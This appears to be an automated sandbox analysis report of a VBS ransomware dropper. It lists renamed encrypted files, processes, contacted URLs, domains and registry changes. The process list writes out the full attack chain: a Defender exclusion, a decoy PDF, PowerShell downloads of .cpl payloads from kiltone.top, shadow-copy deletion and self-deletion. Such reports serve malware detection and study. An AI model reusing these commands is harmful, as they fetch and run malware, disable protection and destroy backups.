C:\Users\user\Desktop\SUAVTZKNFL.docx.DVAd (copy)
data
dropped
C:\Users\user\Desktop\SUAVTZKNFL.pdf.tRzP (copy)
data
dropped
C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.pdf.oSRv (copy)
data
dropped
C:\Users\user\Desktop\SUAVTZKNFL\GIGIYTFFYT.mp3.VOBN (copy)
data
dropped
C:\Users\user\Desktop\SUAVTZKNFL\SQSJKEBWDT.xlsx.suJP (copy)
data
dropped
C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx.LqeT (copy)
data
dropped
C:\Users\user\Desktop\SUAVTZKNFL\ZGGKNSUKOP.png.fhqW (copy)
data
dropped
C:\Users\user\Desktop\TQDFJHPUIU.png.hwrj (copy)
data
dropped
C:\Users\user\Desktop\ZGGKNSUKOP.png
data
dropped
C:\Users\user\Desktop\ZGGKNSUKOP.png.vzFV (copy)
data
dropped
C:\Users\user\Desktop\ZIPXYXWIOY.mp3
data
dropped
C:\Users\user\Desktop\ZIPXYXWIOY.mp3.IDiG (copy)
data
dropped
C:\Users\user\Documents\BNAGMGSPLO.png.XSDv (copy)
data
dropped
C:\Users\user\Documents\EFOYFBOLXA.pdf.VaSK (copy)
data
dropped
C:\Users\user\Documents\EIVQSAOTAQ.jpg.zhAK (copy)
data
dropped
C:\Users\user\Documents\GIGIYTFFYT.mp3.wvms (copy)
data
dropped
C:\Users\user\Documents\GRXZDKKVDB.png
data
dropped
C:\Users\user\Documents\GRXZDKKVDB.png.NnMG (copy)
data
dropped
C:\Users\user\Documents\NVWZAPQSQL.jpg.EvKO (copy)
data
dropped
C:\Users\user\Documents\NVWZAPQSQL.xlsx.wUnQ (copy)
data
dropped
C:\Users\user\Documents\PALRGUCVEH.jpg.tRgo (copy)
OpenPGP Public Key
dropped
C:\Users\user\Documents\PALRGUCVEH.mp3.PlGN (copy)
data
dropped
C:\Users\user\Documents\PALRGUCVEH.pdf.FHtL (copy)
data
dropped
C:\Users\user\Documents\PIVFAGEAAV.docx.KbwQ (copy)
data
dropped
C:\Users\user\Documents\PIVFAGEAAV.jpg.tjwm (copy)
data
dropped
C:\Users\user\Documents\PIVFAGEAAV.xlsx.Hbyw (copy)
data
dropped
C:\Users\user\Documents\PIVFAGEAAV\EIVQSAOTAQ.jpg
data
dropped
C:\Users\user\Documents\PIVFAGEAAV\EIVQSAOTAQ.jpg.iujN (copy)
data
dropped
C:\Users\user\Documents\PIVFAGEAAV\NVWZAPQSQL.xlsx
data
dropped
C:\Users\user\Documents\PIVFAGEAAV\NVWZAPQSQL.xlsx.iOYd (copy)
data
dropped
C:\Users\user\Documents\PIVFAGEAAV\PALRGUCVEH.pdf.wUyz (copy)
data
dropped
C:\Users\user\Documents\PIVFAGEAAV\PIVFAGEAAV.docx
data
dropped
C:\Users\user\Documents\PIVFAGEAAV\PIVFAGEAAV.docx.KvSG (copy)
data
dropped
C:\Users\user\Documents\PIVFAGEAAV\TQDFJHPUIU.png.RMnW (copy)
data
dropped
C:\Users\user\Documents\PIVFAGEAAV\ZIPXYXWIOY.mp3
data
dropped
C:\Users\user\Documents\PIVFAGEAAV\ZIPXYXWIOY.mp3.NgTW (copy)
data
dropped
C:\Users\user\Documents\PWCCAWLGRE.docx
data
dropped
C:\Users\user\Documents\PWCCAWLGRE.docx.EoGH (copy)
data
dropped
C:\Users\user\Documents\PWCCAWLGRE.xlsx.oZBX (copy)
data
dropped
C:\Users\user\Documents\PWCCAWLGRE\GRXZDKKVDB.png
data
dropped
C:\Users\user\Documents\PWCCAWLGRE\GRXZDKKVDB.png.NFZv (copy)
data
dropped
C:\Users\user\Documents\PWCCAWLGRE\NVWZAPQSQL.jpg.FXuV (copy)
data
dropped
C:\Users\user\Documents\PWCCAWLGRE\PALRGUCVEH.mp3.PaIb (copy)
OpenPGP Public Key
dropped
C:\Users\user\Documents\PWCCAWLGRE\PIVFAGEAAV.xlsx
data
dropped
C:\Users\user\Documents\PWCCAWLGRE\PIVFAGEAAV.xlsx.CQOT (copy)
data
dropped
C:\Users\user\Documents\PWCCAWLGRE\PWCCAWLGRE.docx.SojF (copy)
data
dropped
C:\Users\user\Documents\PWCCAWLGRE\SQSJKEBWDT.pdf
data
dropped
C:\Users\user\Documents\PWCCAWLGRE\SQSJKEBWDT.pdf.AnJD (copy)
data
dropped
C:\Users\user\Documents\QCFWYSKMHA.docx.sCGS (copy)
data
dropped
C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.png.aTSz (copy)
data
dropped
C:\Users\user\Documents\QCFWYSKMHA\PIVFAGEAAV.jpg.KCBF (copy)
data
dropped
C:\Users\user\Documents\QCFWYSKMHA\PWCCAWLGRE.xlsx.yYLv (copy)
data
dropped
C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx.OjRs (copy)
data
dropped
C:\Users\user\Documents\QCFWYSKMHA\SQSJKEBWDT.mp3.ZUJd (copy)
data
dropped
C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.pdf
OpenPGP Secret Key
dropped
C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.pdf.ybWi (copy)
OpenPGP Secret Key
dropped
C:\Users\user\Documents\SQSJKEBWDT.mp3.VCiM (copy)
data
dropped
C:\Users\user\Documents\SQSJKEBWDT.pdf.zSBT (copy)
data
dropped
C:\Users\user\Documents\SQSJKEBWDT.xlsx
data
dropped
C:\Users\user\Documents\SQSJKEBWDT.xlsx.ydFM (copy)
data
dropped
C:\Users\user\Documents\SUAVTZKNFL.docx.Kder (copy)
data
dropped
C:\Users\user\Documents\SUAVTZKNFL.pdf
data
dropped
C:\Users\user\Documents\SUAVTZKNFL.pdf.JehM (copy)
data
dropped
C:\Users\user\Documents\SUAVTZKNFL\EFOYFBOLXA.pdf.xEHd (copy)
data
dropped
C:\Users\user\Documents\SUAVTZKNFL\GIGIYTFFYT.mp3.FDkK (copy)
data
dropped
C:\Users\user\Documents\SUAVTZKNFL\PALRGUCVEH.jpg
data
dropped
C:\Users\user\Documents\SUAVTZKNFL\PALRGUCVEH.jpg.aLnb (copy)
data
dropped
C:\Users\user\Documents\SUAVTZKNFL\SQSJKEBWDT.xlsx.qAjI (copy)
data
dropped
C:\Users\user\Documents\SUAVTZKNFL\SUAVTZKNFL.docx.fCTX (copy)
data
dropped
C:\Users\user\Documents\SUAVTZKNFL\ZGGKNSUKOP.png
data
dropped
C:\Users\user\Documents\SUAVTZKNFL\ZGGKNSUKOP.png.hjST (copy)
data
dropped
C:\Users\user\Documents\TQDFJHPUIU.png.FvUn (copy)
data
dropped
C:\Users\user\Documents\ZGGKNSUKOP.png
data
dropped
C:\Users\user\Documents\ZGGKNSUKOP.png.AzRi (copy)
data
dropped
C:\Users\user\Documents\ZIPXYXWIOY.mp3
data
dropped
C:\Users\user\Documents\ZIPXYXWIOY.mp3.WNwU (copy)
data
dropped
C:\Users\user\Downloads\3e6b5c7a-f1f6-4521-b38a-41e203df3636.tmp
PDF document, version 1.6 (zip deflate encoded)
dropped
C:\Users\user\Downloads\BNAGMGSPLO.png.BbGl (copy)
data
dropped
C:\Users\user\Downloads\EFOYFBOLXA.pdf.AJnS (copy)
data
dropped
C:\Users\user\Downloads\EIVQSAOTAQ.jpg.xWDr (copy)
data
dropped
C:\Users\user\Downloads\GIGIYTFFYT.mp3.hNPO (copy)
OpenPGP Secret Key Version 2
dropped
C:\Users\user\Downloads\GRXZDKKVDB.png.DSvz (copy)
data
dropped
C:\Users\user\Downloads\NVWZAPQSQL.jpg.jXxe (copy)
data
dropped
C:\Users\user\Downloads\NVWZAPQSQL.xlsx.PzTr (copy)
data
dropped
C:\Users\user\Downloads\PALRGUCVEH.jpg.urqX (copy)
PGP Secret Sub-key -
dropped
C:\Users\user\Downloads\PALRGUCVEH.mp3
data
dropped
C:\Users\user\Downloads\PALRGUCVEH.mp3.ceXj (copy)
data
dropped
C:\Users\user\Downloads\PALRGUCVEH.pdf.DhmR (copy)
data
dropped
C:\Users\user\Downloads\PIVFAGEAAV.docx
data
dropped
C:\Users\user\Downloads\PIVFAGEAAV.docx.uTlg (copy)
data
dropped
C:\Users\user\Downloads\PIVFAGEAAV.jpg.sKAN (copy)
data
dropped
C:\Users\user\Downloads\PIVFAGEAAV.xlsx.VQca (copy)
data
dropped
C:\Users\user\Downloads\PWCCAWLGRE.docx
data
dropped
C:\Users\user\Downloads\PWCCAWLGRE.docx.Kpro (copy)
data
dropped
C:\Users\user\Downloads\PWCCAWLGRE.xlsx
data
dropped
C:\Users\user\Downloads\PWCCAWLGRE.xlsx.dYKD (copy)
data
dropped
C:\Users\user\Downloads\QCFWYSKMHA.docx
data
dropped
C:\Users\user\Downloads\QCFWYSKMHA.docx.kieO (copy)
data
dropped
C:\Users\user\Downloads\SQSJKEBWDT.mp3.DTCV (copy)
data
dropped
C:\Users\user\Downloads\SQSJKEBWDT.pdf.jsez (copy)
data
dropped
C:\Users\user\Downloads\SUAVTZKNFL.docx.HzwX (copy)
data
dropped
C:\Users\user\Downloads\SUAVTZKNFL.pdf.ykDd (copy)
data
dropped
C:\Users\user\Downloads\TQDFJHPUIU.png
data
dropped
C:\Users\user\Downloads\TQDFJHPUIU.png.XQDF (copy)
data
dropped
C:\Users\user\Downloads\ZGGKNSUKOP.png.YClX (copy)
data
dropped
C:\Users\user\Downloads\ZIPXYXWIOY.mp3.baRA (copy)
data
dropped
C:\Users\user\Downloads\be032c20-43a3-4996-a07b-7fbdcff774d3.tmp
PDF document, version 1.6 (zip deflate encoded)
dropped
C:\Users\user\Downloads\downloaded.pdf.crdownload
PDF document, version 1.6 (zip deflate encoded)
dropped
C:\Users\user\Downloads\downloaded.pdf.qUDX (copy)
data
dropped
C:\Users\user\Favorites\Amazon.url.rdDs (copy)
data
dropped
C:\Users\user\Favorites\Bing.url.VbmB (copy)
data
dropped
C:\Users\user\Favorites\Facebook.url.fOSa (copy)
data
dropped
C:\Users\user\Favorites\Google.url.tKbU (copy)
data
dropped
C:\Users\user\Favorites\Live.url.LYbX (copy)
data
dropped
C:\Users\user\Favorites\NYTimes.url.Tdnf (copy)
data
dropped
C:\Users\user\Favorites\Reddit.url
data
dropped
C:\Users\user\Favorites\Reddit.url.YFaU (copy)
data
dropped
C:\Users\user\Favorites\Twitter.url.JYZb (copy)
data
dropped
C:\Users\user\Favorites\Wikipedia.url.HkqY (copy)
data
dropped
C:\Users\user\Favorites\Youtube.url.cmae (copy)
data
dropped
C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.dfXP (copy)
data
dropped
C:\Users\user\ntuser.ini.deyZ (copy)
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
Chrome Cache Entry: 625
HTML document, ASCII text, with very long lines (6862)
downloaded
Chrome Cache Entry: 626
PDF document, version 1.6 (zip deflate encoded)
downloaded
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 796 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
malicious
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl
malicious
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c %temp%/eryy65ty.exe
malicious
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
C:\Users\user\AppData\Local\Temp/eryy65ty.exe
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\shCUqe\shCU\..\..\Windows\shCU\shCU\..\..\system32\shCU\shCU\..\..\wbem\shCU\shCUq\..\..\wmic.exe shadowcopy delete
malicious
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\fPLdrv\fPLd\..\..\Windows\fPLd\fPLd\..\..\system32\fPLd\fPLd\..\..\wbem\fPLd\fPLdr\..\..\wmic.exe shadowcopy delete
malicious
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\gNJiqW\gNJi\..\..\Windows\gNJi\gNJi\..\..\system32\gNJi\gNJi\..\..\wbem\gNJi\gNJiq\..\..\wmic.exe shadowcopy delete
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\SmbaZD\Smba\..\..\Windows\Smba\Smba\..\..\system32\Smba\Smba\..\..\wbem\Smba\SmbaZ\..\..\wmic.exe shadowcopy delete
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
malicious
C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\VhJyqT\VhJy\..\..\Windows\VhJy\VhJy\..\..\system32\VhJy\VhJy\..\..\wbem\VhJy\VhJyq\..\..\wmic.exe shadowcopy delete
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
malicious
C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\EpadjY\Epad\..\..\Windows\Epad\Epad\..\..\system32\Epad\Epad\..\..\wbem\Epad\Epadj\..\..\wmic.exe shadowcopy delete
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
malicious
C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2016,i,7727071625406285567,4283038652588127997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\control.exe
control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\notepad.exe
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 40 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://kiltone.top/ste
unknown
malicious
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
malicious
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443
unknown
malicious
https://kiltone.top/stelin/Gosjeufon.cpl
45.125.67.168
malicious
https://kiltone.top/stelin/rwcla.cpl
45.125.67.168
malicious
https://www.oldmutual.co.za/v3/assets/blt0
unknown
malicious
https://kiltone.top/stelin/rwcla.
unknown
malicious
https://www.avito.ru/
unknown
https://tse1.mm.bing.net/th?id=OADD2.10239381138051_1QKM3152ZV6SHG2T8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
150.171.27.10
https://digify.com/a/#/access/login
unknown
https://www.ctrip.com/
unknown
https://www.leboncoin.fr/
unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
unknown
https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp
unknown
https://account.bellmedia.c
unknown
https://tse1.mm.bing.net/th?id=OADD2.10239360289361_1Y3IOPY47MV63L7US&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
150.171.27.10
https://weibo.com/
unknown
https://login.microsoftonline.com
unknown
https://www.ifeng.com/
unknown
https://www.zhihu.com/
unknown
https://tse1.mm.bing.net/th?id=OADD2.10239381138052_1MNXWX7WFZ12D7OBJ&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90
150.171.27.10
http://x1.c.lencr.org/0
unknown
http://x1.i.lencr.org/0
unknown
https://www.msn.com
unknown
https://www.oldmutual.co.za/favicon.ico
18.161.69.63
https://www.reddit.com/
unknown
https://www.amazon.ca/
unknown
https://www.ebay.co.uk/
unknown
https://github.com/mozilla/webcompat-reporter
unknown
https://www.amazon.co.uk/
unknown
https://www.ebay.de/
unknown
https://screenshots.firefox.com/
unknown
file:///C:/Users/user/Downloads/downloaded.pdf
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
unknown
https://www.amazon.com/
unknown
https://www.google.com/search?client=firefox-b-d&q=
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0
unknown
http://crl.ver)
unknown
http://ocsp.rootca1.amazontrust.com0:
unknown
https://www.wykop.pl/
unknown
https://twitter.com/
unknown
https://digify.com/a/#/access/logincmd
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://www.olx.pl/
unknown
https://www.youtube.com/
unknown
https://allegro.pl/
unknown
https://support.mozilla.org/products/firefox
unknown
https://MD8.mozilla.org/1/m
unknown
https://www.bbc.co.uk/
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
https://bugzilla.mo
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
unknown
https://tse1.mm.bing.net/th?id=OADD2.10239360432890_1TOC5U5IB565A9QI0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
150.171.27.10
https://www.amazon.fr/
unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?
unknown
https://www.google.com/complete/
unknown
https://support.mozilla.org
unknown
https://tse1.mm.bing.net/th?id=OADD2.10239360432892_19VCX0OIIPQAUNJ24&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
150.171.27.10
https://www.google.com/
unknown
https://tse1.mm.bing.net/th?id=OADD2.10239360288102_1UBFDLT4HJHZEPK84&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
150.171.27.10
https://www.iqiyi.com/
unknown
https://www.amazon.de/
unknown
https://www.baidu.com/
unknown
There are 54 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
d12y248af9ueom.cloudfront.net
18.161.69.63
www.google.com
142.250.181.132
kiltone.top
45.125.67.168
www.oldmutual.co.za
unknown

IPs

IP
Domain
Country
Malicious
239.255.255.250
unknown
Reserved
45.125.67.168
kiltone.top
Hong Kong
18.161.69.63
d12y248af9ueom.cloudfront.net
United States
127.0.0.1
unknown
unknown
192.168.2.6
unknown
unknown
142.250.181.132
www.google.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
XPSUDTARW
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
UID
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
Public
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
Private
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fWindowsOnlyEOL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fPasteOriginalEOL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fReverse
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fWrapAround
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fMatchCase
There are 29 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1C76F422000
heap
page read and write
203B057A000
heap
page read and write
203B0440000
heap
page read and write
BCCF000
heap
page read and write
38C3C7A000
stack
page read and write
7D03FFE000
unkown
page readonly
7D0417E000
stack
page read and write
A681000
heap
page read and write
55A000
heap
page read and write
26459200000
heap
page read and write
2026AE2A000
heap
page read and write
29AC000
heap
page read and write
1C76F1F3000
heap
page read and write
2026ADB0000
trusted library allocation
page read and write
2567B203000
heap
page read and write
26459313000
heap
page read and write
2567B203000
heap
page read and write
1EC191C2000
heap
page read and write
1EF63E3E000
heap
page read and write
1EC18CBB000
heap
page read and write
27413BC0000
heap
page read and write
D260A7E000
stack
page read and write
26458B29000
heap
page read and write
A789000
heap
page read and write
53275FE000
stack
page read and write
586000
heap
page read and write
2645E263000
heap
page read and write
1EC191C5000
heap
page read and write
A1CC87F000
stack
page read and write
2567B201000
heap
page read and write
BB90000
trusted library allocation
page read and write
1EC191C3000
heap
page read and write
1F4006F7000
heap
page read and write
26458AB1000
heap
page read and write
2567B206000
heap
page read and write
1F400720000
heap
page read and write
264589E0000
trusted library allocation
page read and write
1EF63E37000
heap
page read and write
1EC18A54000
heap
page read and write
A681000
heap
page read and write
1EF63F87000
heap
page read and write
1EF63E3E000
heap
page read and write
203B0620000
heap
page read and write
1C76F1F8000
heap
page read and write
BA83000
heap
page read and write
CBED77F000
stack
page read and write
1EC191C0000
heap
page read and write
A1CC51A000
stack
page read and write
27413C02000
heap
page read and write
EDF4FFE000
stack
page read and write
2026AE57000
heap
page read and write
2645E030000
trusted library allocation
page read and write
566000
heap
page read and write
1C76F927000
heap
page read and write
1F400C27000
heap
page read and write
45E000
unkown
page readonly
2567B206000
heap
page read and write
1C76F3D0000
trusted library allocation
page read and write
1EC18A63000
heap
page read and write
38C3EFF000
stack
page read and write
274143EC000
heap
page read and write
2026AE20000
heap
page read and write
1C76F495000
heap
page read and write
2645E306000
heap
page read and write
21DF55E0000
heap
page read and write
7D036FE000
unkown
page readonly
